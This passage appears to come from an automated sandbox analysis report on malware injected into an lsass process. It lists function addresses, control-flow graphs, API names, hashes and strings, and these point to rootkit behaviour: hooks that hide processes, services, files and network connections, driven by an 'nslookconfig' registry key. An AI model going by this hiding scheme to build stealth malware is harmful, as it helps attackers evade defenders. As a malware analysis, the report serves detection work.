                            • Opcode Fuzzy Hash: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction Fuzzy Hash: 29E0E61062570554FE946766ACDDF991299E74C7CCF1C043C9B4D4F792ED3880D9530D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2B835D0 Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 39 240b2b835d0-240b2b83632 call 240b2b834b0 * 4 48 240b2b83638-240b2b8363b 39->48 49 240b2b838d2-240b2b838e6 39->49 48->49 50 240b2b83641-240b2b83644 48->50 50->49 51 240b2b8364a-240b2b8364d 50->51 51->49 52 240b2b83653-240b2b83672 51->52 52->49 54 240b2b83678-240b2b83681 52->54 55 240b2b836a1-240b2b836b5 54->55 56 240b2b83683-240b2b83689 54->56 58 240b2b8370f-240b2b83716 55->58 59 240b2b836b7 55->59 57 240b2b83690-240b2b8369f 56->57 57->55 57->57 61 240b2b837cc-240b2b837d4 58->61 62 240b2b8371c-240b2b83730 58->62 60 240b2b836c0-240b2b836df 59->60 63 240b2b836e1-240b2b836e7 60->63 64 240b2b83704-240b2b8370d 60->64 65 240b2b837da-240b2b837f1 61->65 66 240b2b8389e-240b2b838ce 61->66 67 240b2b83736-240b2b8373b 62->67 68 240b2b837c7 62->68 69 240b2b836f0-240b2b83702 63->69 64->58 64->60 65->66 70 240b2b837f7 65->70 66->49 71 240b2b83740-240b2b8374e LoadLibraryA 67->71 68->61 69->64 69->69 73 240b2b83800-240b2b83815 70->73 74 240b2b837af-240b2b837b8 71->74 75 240b2b83750-240b2b83760 71->75 77 240b2b8388d-240b2b83898 73->77 78 240b2b83817 73->78 74->71 76 240b2b837ba-240b2b837c2 74->76 75->74 79 240b2b83762-240b2b83768 75->79 76->68 77->66 77->73 80 240b2b83820-240b2b83831 78->80 81 240b2b8376a-240b2b8378c 79->81 82 240b2b8378e-240b2b83798 79->82 84 240b2b8383e-240b2b83842 80->84 85 240b2b83833-240b2b8383c 80->85 83 240b2b8379e-240b2b837ad 81->83 82->83 83->74 83->79 87 240b2b8384f-240b2b83853 84->87 88 240b2b83844-240b2b8384d 84->88 86 240b2b8387a-240b2b8388b 85->86 86->77 86->80 89 240b2b8386a-240b2b8386e 87->89 90 240b2b83855-240b2b83868 87->90 88->86 89->86 91 240b2b83870-240b2b83875 89->91 90->86 91->86
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction ID: 10603fc9934f911dc8bfe334a8204fe3a1cbc36b8d5954e21b846d035cc5e1c9
                            • Opcode Fuzzy Hash: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction Fuzzy Hash: C481EE7370169087DB558F15D49CB6A77A9FB48B98F098128DF0E0F384EE38D892C705
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00000240B2BB1400 Relevance: 47.5, APIs: 18, Strings: 9, Instructions: 240registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CloseOpen$Concurrency::cancel_current_taskEnumInfoQueryValuelstrcmpilstrlen
                            • String ID: SOFTWARE\nslookconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                            • API String ID: 2205723969-4286660177
                            • Opcode ID: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction ID: 36d96ed6ba9acfdb5b1d227e47fa163c3954f2918317e92d1a09cf9de4e0edce
                            • Opcode Fuzzy Hash: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction Fuzzy Hash: 70C13432610B108AE710DF62E89CB9E77B8F788B88F05841ADB895BB55DF78C594C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BBBEC8 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction ID: b08139070d3228eaf542e35dbef6c80b101419e437285916c82d3c7cfe1eb281
                            • Opcode Fuzzy Hash: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction Fuzzy Hash: 98316D36214F8086DB648F25E88C79E77B0F788798F50011AEB9D4BB98DF38C295CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BC1000 Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction ID: e50231c2316fade2453f452b56489106d5647e766db4a23dab7845d94281d02a
                            • Opcode Fuzzy Hash: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction Fuzzy Hash: A8D1EE72714B809AEB00CB64D48CADD7BB1F74979CF54421ACF8A6BB99DE38C196C704
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB1F20 Relevance: 57.9, APIs: 21, Strings: 12, Instructions: 167libraryloaderthreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 92 240b2bb1f20-240b2bb1f2b 93 240b2bb1f31-240b2bb1f62 call 240b2bb69c0 GetCurrentThread call 240b2bb6ee0 GetModuleHandleA 92->93 94 240b2bb2255-240b2bb2259 92->94 99 240b2bb1f95 93->99 100 240b2bb1f64-240b2bb1f7e GetProcAddress 93->100 101 240b2bb1f9c-240b2bb1fac GetModuleHandleA 99->101 100->101 102 240b2bb1f80-240b2bb1f93 call 240b2bb5fa0 100->102 104 240b2bb1fdf 101->104 105 240b2bb1fae-240b2bb1fc8 GetProcAddress 101->105 102->101 108 240b2bb1fe6-240b2bb1ff6 GetModuleHandleA 104->108 107 240b2bb1fca-240b2bb1fdd call 240b2bb5fa0 105->107 105->108 107->108 110 240b2bb2029 108->110 111 240b2bb1ff8-240b2bb2012 GetProcAddress 108->111 112 240b2bb2030-240b2bb2040 GetModuleHandleA 110->112 111->112 114 240b2bb2014-240b2bb2027 call 240b2bb5fa0 111->114 115 240b2bb2073 112->115 116 240b2bb2042-240b2bb205c GetProcAddress 112->116 114->112 118 240b2bb207a-240b2bb208a GetModuleHandleA 115->118 116->118 119 240b2bb205e-240b2bb2071 call 240b2bb5fa0 116->119 122 240b2bb20bd 118->122 123 240b2bb208c-240b2bb20a6 GetProcAddress 118->123 119->118 126 240b2bb20c4-240b2bb20d4 GetModuleHandleA 122->126 125 240b2bb20a8-240b2bb20bb call 240b2bb5fa0 123->125 123->126 125->126 128 240b2bb2107 126->128 129 240b2bb20d6-240b2bb20f0 GetProcAddress 126->129 130 240b2bb210e-240b2bb211e GetModuleHandleA 128->130 129->130 132 240b2bb20f2-240b2bb2105 call 240b2bb5fa0 129->132 133 240b2bb2151 130->133 134 240b2bb2120-240b2bb213a GetProcAddress 130->134 132->130 137 240b2bb2158-240b2bb2168 GetModuleHandleA 133->137 134->137 138 240b2bb213c-240b2bb214f call 240b2bb5fa0 134->138 140 240b2bb219b 137->140 141 240b2bb216a-240b2bb2184 GetProcAddress 137->141 138->137 143 240b2bb21a2-240b2bb21b2 GetModuleHandleA 140->143 141->143 144 240b2bb2186-240b2bb2199 call 240b2bb5fa0 141->144 146 240b2bb21e5 143->146 147 240b2bb21b4-240b2bb21ce GetProcAddress 143->147 144->143 148 240b2bb21ec-240b2bb21fc GetModuleHandleA 146->148 147->148 149 240b2bb21d0-240b2bb21e3 call 240b2bb5fa0 147->149 152 240b2bb223b 148->152 153 240b2bb21fe-240b2bb2218 GetProcAddress 148->153 149->148 156 240b2bb2242-240b2bb224b 152->156 155 240b2bb221a-240b2bb2236 call 240b2bb5fa0 153->155 153->156 158 240b2bb6a30-240b2bb6a3f call 240b2bb6a40 155->158 156->94 156->158
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc$CurrentThread
                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                            • API String ID: 4239977575-1975688563
                            • Opcode ID: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction ID: 5a230cfe1715b951945824e4d79379b3b11e199d200754eb448e630aac9c39b6
                            • Opcode Fuzzy Hash: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction Fuzzy Hash: 1B915324612B0591FE55DB14F8DCB9832A4FB5C79CF98582D874A0E2A8EF38C6D9C31D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB29E0 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 379stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 233 240b2bb29e0-240b2bb2abc call 240b2bd0ca8 236 240b2bb2fa8-240b2bb2fca call 240b2bb83e0 233->236 237 240b2bb2ac2-240b2bb2ac6 233->237 237->236 239 240b2bb2acc-240b2bb2ada 237->239 239->236 241 240b2bb2ae0-240b2bb2b25 call 240b2bb9890 * 3 GetFileType 239->241 248 240b2bb2b30-240b2bb2b4b GetFinalPathNameByHandleW 241->248 249 240b2bb2b27-240b2bb2b2e 241->249 251 240b2bb2b4d-240b2bb2b68 call 240b2bba610 248->251 252 240b2bb2b92-240b2bb2b96 248->252 250 240b2bb2b85-240b2bb2b8c lstrcpyW 249->250 250->252 251->252 262 240b2bb2b6a-240b2bb2b7c lstrlenW 251->262 254 240b2bb2dfc-240b2bb2e11 252->254 255 240b2bb2b9c-240b2bb2bb6 call 240b2bb3b00 252->255 257 240b2bb2e15-240b2bb2e1f 254->257 263 240b2bb2bb8-240b2bb2bcd call 240b2bba610 255->263 264 240b2bb2bd3-240b2bb2c0c call 240b2bb3b00 lstrcmpiW 255->264 260 240b2bb2e3d 257->260 261 240b2bb2e21-240b2bb2e3b 257->261 265 240b2bb2e40-240b2bb2e54 call 240b2bb3b00 260->265 261->265 262->252 266 240b2bb2b7e 262->266 263->264 274 240b2bb2cb0-240b2bb2cf8 call 240b2bd0ca8 263->274 275 240b2bb2c0e-240b2bb2c25 lstrcpyW lstrcatW 264->275 276 240b2bb2c27-240b2bb2c30 PathCombineW 264->276 277 240b2bb2e73-240b2bb2ea8 call 240b2bb3b00 lstrcmpiW 265->277 278 240b2bb2e56-240b2bb2e6d call 240b2bba610 265->278 266->250 274->236 291 240b2bb2cfe-240b2bb2d16 call 240b2bb3b00 274->291 282 240b2bb2c33-240b2bb2c3d 275->282 276->282 289 240b2bb2eaa-240b2bb2ec1 lstrcpyW lstrcatW 277->289 290 240b2bb2ec3-240b2bb2ecc PathCombineW 277->290 278->277 288 240b2bb2f4c-240b2bb2f4f 278->288 286 240b2bb2c43-240b2bb2c4a 282->286 287 240b2bb2fa4 282->287 286->287 292 240b2bb2c50-240b2bb2c55 286->292 287->236 295 240b2bb2f71-240b2bb2f74 288->295 296 240b2bb2f51-240b2bb2f6f call 240b2bb9480 288->296 293 240b2bb2ecf-240b2bb2ed9 289->293 290->293 306 240b2bb2d18-240b2bb2d2f call 240b2bba610 291->306 307 240b2bb2d35-240b2bb2d6e call 240b2bb3b00 lstrcmpiW 291->307 292->287 297 240b2bb2c5b 292->297 298 240b2bb2edb-240b2bb2ee2 293->298 299 240b2bb2f23-240b2bb2f2e 293->299 302 240b2bb2f7d-240b2bb2f80 295->302 303 240b2bb2f76-240b2bb2f7b 295->303 311 240b2bb2f31-240b2bb2f34 296->311 304 240b2bb2c60-240b2bb2c71 297->304 298->299 305 240b2bb2ee4-240b2bb2ee9 298->305 299->311 302->287 312 240b2bb2f82-240b2bb2f9b 302->312 303->236 309 240b2bb2c7b lstrcmpW 304->309 310 240b2bb2c73-240b2bb2c79 lstrcmpiW 304->310 305->299 315 240b2bb2eeb 305->315 306->274 306->307 323 240b2bb2d89-240b2bb2d92 PathCombineW 307->323 324 240b2bb2d70-240b2bb2d87 lstrcpyW lstrcatW 307->324 313 240b2bb2c81-240b2bb2c8b 309->313 310->313 311->287 314 240b2bb2f36-240b2bb2f3e 311->314 312->287 318 240b2bb2c98-240b2bb2ca7 313->318 319 240b2bb2c8d-240b2bb2c91 313->319 314->257 320 240b2bb2ef0-240b2bb2f01 315->320 318->274 319->304 325 240b2bb2c93 319->325 326 240b2bb2f0b lstrcmpW 320->326 327 240b2bb2f03-240b2bb2f09 lstrcmpiW 320->327 328 240b2bb2d95-240b2bb2d9f 323->328 324->328 325->287 329 240b2bb2f11-240b2bb2f1b 326->329 327->329 328->287 330 240b2bb2da5-240b2bb2dac 328->330 331 240b2bb2f1d-240b2bb2f21 329->331 332 240b2bb2f43-240b2bb2f47 329->332 330->287 333 240b2bb2db2-240b2bb2db7 330->333 331->299 331->320 332->288 333->287 334 240b2bb2dbd 333->334 335 240b2bb2dc0-240b2bb2dd1 334->335 336 240b2bb2ddb lstrcmpW 335->336 337 240b2bb2dd3-240b2bb2dd9 lstrcmpiW 335->337 338 240b2bb2de1-240b2bb2deb 336->338 337->338 338->318 339 240b2bb2df1-240b2bb2df5 338->339 339->335 340 240b2bb2df7 339->340 340->287
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmpi$Pathlstrcpy$Combinelstrcatlstrcmp$FileFinalHandleNameType_invalid_parameter_noinfolstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 4069998685-1812639415
                            • Opcode ID: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction ID: 2a7cabc3e4d2bbc14bf58373884e0d3b61dc8e79d07c0b4028e9064b987b7d51
                            • Opcode Fuzzy Hash: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction Fuzzy Hash: C1F17D32704B818AEB649F25E8DCB9977B1F78DB98F444019DB494BB98DF38C586C704
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB33C0 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 370stringlibraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 341 240b2bb33c0-240b2bb343c call 240b2bd0ce0 344 240b2bb3442-240b2bb3448 341->344 345 240b2bb3956-240b2bb3975 call 240b2bb83e0 341->345 344->345 346 240b2bb344e-240b2bb3451 344->346 346->345 348 240b2bb3457-240b2bb345a 346->348 348->345 350 240b2bb3460-240b2bb3470 GetModuleHandleA 348->350 351 240b2bb3482-240b2bb34a1 350->351 352 240b2bb3472-240b2bb347c GetProcAddress 350->352 351->345 354 240b2bb34a7-240b2bb34c0 call 240b2bba610 351->354 352->351 354->345 357 240b2bb34c6-240b2bb34d5 354->357 358 240b2bb34db-240b2bb34e6 357->358 359 240b2bb394e 357->359 358->359 360 240b2bb34ec-240b2bb350c 358->360 359->345 361 240b2bb393a-240b2bb3946 360->361 362 240b2bb3512-240b2bb3519 360->362 361->359 363 240b2bb3520-240b2bb352f 362->363 364 240b2bb36d0-240b2bb36d3 363->364 365 240b2bb3535-240b2bb3538 363->365 366 240b2bb3929-240b2bb3934 364->366 367 240b2bb36d9-240b2bb36dc 364->367 368 240b2bb353a-240b2bb3558 OpenProcess 365->368 369 240b2bb35b9-240b2bb35bc 365->369 366->361 366->363 370 240b2bb36de-240b2bb36fb OpenProcess 367->370 371 240b2bb375c-240b2bb375f 367->371 372 240b2bb355a-240b2bb3575 K32GetModuleFileNameExW 368->372 373 240b2bb35b2 368->373 374 240b2bb35be-240b2bb35ca 369->374 375 240b2bb3633-240b2bb3636 369->375 378 240b2bb36fd-240b2bb3718 K32GetModuleFileNameExW 370->378 379 240b2bb3755 370->379 382 240b2bb37a3-240b2bb37a6 371->382 383 240b2bb3761-240b2bb376d 371->383 380 240b2bb35a9-240b2bb35ac CloseHandle 372->380 381 240b2bb3577-240b2bb3596 PathFindFileNameW lstrlenW 372->381 373->369 384 240b2bb35cc-240b2bb35e0 374->384 385 240b2bb35f6-240b2bb35f9 374->385 376 240b2bb3638-240b2bb363b 375->376 377 240b2bb3672-240b2bb3675 375->377 386 240b2bb3641-240b2bb364c 376->386 387 240b2bb3837-240b2bb3853 call 240b2bba610 376->387 377->387 391 240b2bb367b-240b2bb3684 377->391 388 240b2bb371a-240b2bb3739 PathFindFileNameW lstrlenW 378->388 389 240b2bb374c-240b2bb374f CloseHandle 378->389 379->371 380->373 381->380 390 240b2bb3598-240b2bb35a3 lstrcpyW 381->390 395 240b2bb37a8-240b2bb37ab 382->395 396 240b2bb37e2-240b2bb37e5 382->396 383->382 392 240b2bb376f-240b2bb3786 383->392 393 240b2bb35e3-240b2bb35e9 384->393 385->375 394 240b2bb35fb-240b2bb3607 385->394 386->377 397 240b2bb364e-240b2bb365d 386->397 424 240b2bb3859 387->424 425 240b2bb3922 387->425 388->389 399 240b2bb373b-240b2bb3746 lstrcpyW 388->399 389->379 390->380 391->387 400 240b2bb368a 391->400 401 240b2bb3790-240b2bb3796 392->401 402 240b2bb35ef-240b2bb35f4 393->402 403 240b2bb3860-240b2bb386d 393->403 394->375 405 240b2bb3609-240b2bb361d 394->405 395->387 406 240b2bb37b1-240b2bb37bc 395->406 396->387 398 240b2bb37e7-240b2bb37f0 396->398 410 240b2bb3660-240b2bb3666 397->410 398->387 411 240b2bb37f2-240b2bb37f6 398->411 399->389 412 240b2bb3690-240b2bb36a6 400->412 401->403 413 240b2bb379c-240b2bb37a1 401->413 402->385 402->393 407 240b2bb391a-240b2bb3920 403->407 408 240b2bb3873-240b2bb387a 403->408 415 240b2bb3620-240b2bb3626 405->415 406->396 409 240b2bb37be-240b2bb37cc 406->409 407->366 417 240b2bb3889-240b2bb388c 408->417 418 240b2bb387c-240b2bb3887 408->418 419 240b2bb37d0-240b2bb37d6 409->419 410->403 420 240b2bb366c-240b2bb3670 410->420 421 240b2bb3800-240b2bb3816 411->421 422 240b2bb36a8-240b2bb36ae lstrcmpiW 412->422 423 240b2bb36b0 lstrcmpW 412->423 413->382 413->401 415->403 416 240b2bb362c-240b2bb3631 415->416 416->375 416->415 428 240b2bb38af-240b2bb38b7 417->428 429 240b2bb388e-240b2bb3895 417->429 426 240b2bb3899-240b2bb38aa call 240b2bb9480 418->426 419->403 427 240b2bb37dc-240b2bb37e0 419->427 420->377 420->410 430 240b2bb3818-240b2bb381e lstrcmpiW 421->430 431 240b2bb3820 lstrcmpW 421->431 432 240b2bb36b6-240b2bb36bf 422->432 423->432 424->403 425->366 426->428 427->396 427->419 434 240b2bb38b9-240b2bb38ea call 240b2bb9480 428->434 435 240b2bb38ef-240b2bb38f2 428->435 429->426 436 240b2bb3826-240b2bb382f 430->436 431->436 432->424 437 240b2bb36c5-240b2bb36c9 432->437 434->435 439 240b2bb3918 435->439 440 240b2bb38f4-240b2bb3913 call 240b2bb9480 435->440 436->424 441 240b2bb3831-240b2bb3835 436->441 437->412 442 240b2bb36cb 437->442 439->407 440->439 441->387 441->421 442->387
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
                            • String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
                            • API String ID: 3769777229-563693742
                            • Opcode ID: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction ID: 957cbcf540196e97f36ae8f4c2b067a49a7b491543009e4450804e1a4775df9b
                            • Opcode Fuzzy Hash: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction Fuzzy Hash: 55F19D7670569086EB648F16E88CBA973A4F78CB88F45402ADF4A4B784DF38D884C749
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB2630 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 195stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 444 240b2bb2630-240b2bb26c0 call 240b2bd0ce8 447 240b2bb298d-240b2bb29aa call 240b2bb83e0 444->447 448 240b2bb26c6-240b2bb26ca 444->448 448->447 450 240b2bb26d0-240b2bb26de 448->450 450->447 452 240b2bb26e4-240b2bb274a call 240b2bb9890 * 3 GetFileType 450->452 459 240b2bb274c-240b2bb2753 452->459 460 240b2bb2755-240b2bb2771 GetFinalPathNameByHandleW 452->460 461 240b2bb27ae-240b2bb27b3 lstrcpyW 459->461 462 240b2bb27b9-240b2bb27bd 460->462 463 240b2bb2773-240b2bb278f call 240b2bba610 460->463 461->462 465 240b2bb27c5-240b2bb27d0 462->465 463->462 469 240b2bb2791-240b2bb27a4 lstrlenW 463->469 467 240b2bb27ed-240b2bb2805 call 240b2bb3b00 465->467 468 240b2bb27d2-240b2bb27e4 465->468 474 240b2bb2807-240b2bb281e call 240b2bba610 467->474 475 240b2bb2824-240b2bb285b call 240b2bb3b00 lstrcmpiW 467->475 468->467 469->462 471 240b2bb27a6 469->471 471->461 474->475 480 240b2bb291a-240b2bb291c 474->480 481 240b2bb287e-240b2bb2887 PathCombineW 475->481 482 240b2bb285d-240b2bb287c lstrcpyW lstrcatW 475->482 483 240b2bb2939-240b2bb293c 480->483 484 240b2bb291e-240b2bb2937 call 240b2bb9480 480->484 485 240b2bb288a-240b2bb2894 481->485 482->485 489 240b2bb293e-240b2bb2943 483->489 490 240b2bb2945-240b2bb2949 483->490 491 240b2bb28fd-240b2bb28ff 484->491 487 240b2bb28e8-240b2bb28fa 485->487 488 240b2bb2896-240b2bb289d 485->488 487->491 488->487 493 240b2bb289f-240b2bb28a3 488->493 494 240b2bb296d-240b2bb2985 489->494 495 240b2bb294b-240b2bb295d 490->495 496 240b2bb2969 490->496 491->496 497 240b2bb2901 491->497 493->487 498 240b2bb28a5 493->498 494->447 495->496 496->494 497->465 499 240b2bb28b0-240b2bb28c7 498->499 500 240b2bb28c9-240b2bb28cf lstrcmpiW 499->500 501 240b2bb28d1 lstrcmpW 499->501 502 240b2bb28d7-240b2bb28e0 500->502 501->502 503 240b2bb28e2-240b2bb28e6 502->503 504 240b2bb2906-240b2bb2912 502->504 503->487 503->499 504->480
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: FileFinalHandleNamePathTypelstrcpylstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 2439355722-1812639415
                            • Opcode ID: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction ID: 6ff4464cc617da9bf3d74b1ba0b0a4967fa998d0100f28d241e82ef3fca12e61
                            • Opcode Fuzzy Hash: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction Fuzzy Hash: 029164262047C485EB749F11E8DCBAA77A0F78DB88F444019DF894BB99DF38D586CB08
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB24F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 76filethreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                            • String ID: \\.\pipe\nslookchildproc32$\\.\pipe\nslookchildproc64
                            • API String ID: 2171963597-3427204187
                            • Opcode ID: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction ID: 3b47049c092ea82d01c2fdadaf86b792e8e4f0a42d6ff81b3fe22daa87d5e0fd
                            • Opcode Fuzzy Hash: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction Fuzzy Hash: 12310B26204A4086EB249F25F49CB5A77B4F78DBA9F4401299F9D0BB58DF3DC5898B04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB86EC Relevance: 15.2, APIs: 10, Instructions: 231COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 625 240b2bb86ec-240b2bb86f2 626 240b2bb872d-240b2bb8737 625->626 627 240b2bb86f4-240b2bb86f7 625->627 630 240b2bb8854-240b2bb8869 626->630 628 240b2bb86f9-240b2bb86fc 627->628 629 240b2bb8721-240b2bb8760 call 240b2bb8ec8 627->629 631 240b2bb86fe-240b2bb8701 628->631 632 240b2bb8714 __scrt_dllmain_crt_thread_attach 628->632 648 240b2bb882e 629->648 649 240b2bb8766-240b2bb877b call 240b2bb8d5c 629->649 633 240b2bb886b 630->633 634 240b2bb8878-240b2bb8892 call 240b2bb8d5c 630->634 636 240b2bb870d-240b2bb8712 call 240b2bb8e0c 631->636 637 240b2bb8703-240b2bb870c 631->637 640 240b2bb8719-240b2bb8720 632->640 638 240b2bb886d-240b2bb8877 633->638 646 240b2bb88cb-240b2bb88fc call 240b2bb9098 634->646 647 240b2bb8894-240b2bb88c9 call 240b2bb8e84 call 240b2bb8d24 call 240b2bb9220 call 240b2bb9038 call 240b2bb905c call 240b2bb8eb4 634->647 636->640 659 240b2bb88fe-240b2bb8904 646->659 660 240b2bb890d-240b2bb8913 646->660 647->638 653 240b2bb8830-240b2bb8845 648->653 657 240b2bb8781-240b2bb8792 call 240b2bb8dcc 649->657 658 240b2bb8846-240b2bb8853 call 240b2bb9098 649->658 675 240b2bb87e3-240b2bb87ed call 240b2bb9038 657->675 676 240b2bb8794-240b2bb87b8 call 240b2bb91e4 call 240b2bb8d14 call 240b2bb8d40 call 240b2bba900 657->676 658->630 659->660 664 240b2bb8906-240b2bb8908 659->664 665 240b2bb895a-240b2bb8970 call 240b2bb3f20 660->665 666 240b2bb8915-240b2bb891f 660->666 671 240b2bb89fd-240b2bb8a0a 664->671 686 240b2bb89aa-240b2bb89ac 665->686 687 240b2bb8972-240b2bb8974 665->687 672 240b2bb892b-240b2bb8939 call 240b2bc4348 666->672 673 240b2bb8921-240b2bb8929 666->673 678 240b2bb893f-240b2bb8954 call 240b2bb86ec 672->678 688 240b2bb89f3-240b2bb89fb 672->688 673->678 675->648 698 240b2bb87ef-240b2bb87fb call 240b2bb9088 675->698 676->675 728 240b2bb87ba-240b2bb87c1 __scrt_dllmain_after_initialize_c 676->728 678->665 678->688 690 240b2bb89ae-240b2bb89b1 686->690 691 240b2bb89b3-240b2bb89c8 call 240b2bb86ec 686->691 687->688 695 240b2bb8976-240b2bb8998 call 240b2bb3f20 call 240b2bb8854 687->695 688->671 690->688 690->691 691->688 708 